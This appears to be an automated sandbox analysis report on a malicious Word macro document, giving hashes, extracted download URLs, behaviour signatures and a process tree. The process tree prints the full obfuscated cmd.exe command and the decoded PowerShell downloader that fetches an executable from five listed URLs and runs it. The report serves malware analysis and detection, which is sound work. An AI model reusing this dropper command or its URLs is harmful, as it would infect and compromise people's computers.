Analysis
-
max time kernel
130s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
05-05-2024 16:38
General
-
Target
1880d13fa02bef8f17371845e0fe89cc_JaffaCakes118.doc
-
Size
93KB
-
MD5
1880d13fa02bef8f17371845e0fe89cc
-
SHA1
5804bbdae06f7bd57f6711c5ab3adf124fac62af
-
SHA256
be849032d67a24eda952c62593d2c6d991500c0a8e628fd189fa9ca51a221cdb
-
SHA512
599ede07c5c416d7b4d285aa5ee30356d4fbd88411a7d39354413d5cfd3bebc4c798c786cf6dceab7a27cef1824809c78a54882e9d5d3a03cf0bf6892f207cea
-
SSDEEP
1536:focn1kp59gxBK85fBlHF5qFycNGrFMMzV/+a9:A41k/W483lWycNGzV
Malware Config
Extracted
http://www.serefozata.com/axf
http://www.livingbranchanimalsciences.com/zVMQFL
http://www.donghodaian.com/jiPViP
http://sprayzee.com/iiWYe6z
http://yasarkemalplatformu.org/s
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1880d13fa02bef8f17371845e0fe89cc_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$nsH='BKf';$tmv=new-object Net.WebClient;$kjR='http://www.serefozata.com/axf@http://www.livingbranchanimalsciences.com/zVMQFL@http://www.donghodaian.com/jiPViP@http://sprayzee.com/iiWYe6z@http://yasarkemalplatformu.org/s'.Split('@');$wdN='mBN';$Gwb = '390';$vzj='EDk';$BJE=$env:temp+'\'+$Gwb+'.exe';foreach($TBK in $kjR){try{$tmv.DownloadFile($TBK, $BJE);$DKz='hij';If ((Get-Item $BJE).length -ge 80000) {Invoke-Item $BJE;$kiB='mQZ';break;}}catch{}}$Wfp='HEA';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
500B
MD5bc4cb8839c0edb8ff2fd81e238ebf491
SHA1953ad02f2a9240f3ea633ea1802b41cb37d8c843
SHA2560ab9420e40c9a95c287ae06f9c74c06fa5dab4ca736e238d4024c519aa6032ab
SHA512e981f9172399ef27eb576d77abbd9e065a6b5d74b9ddf60bd883f75e6a8213c8c6f9f4d819d8516296026b542195d39c38aabd2c577be3bfc7be25b2905e4f20
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB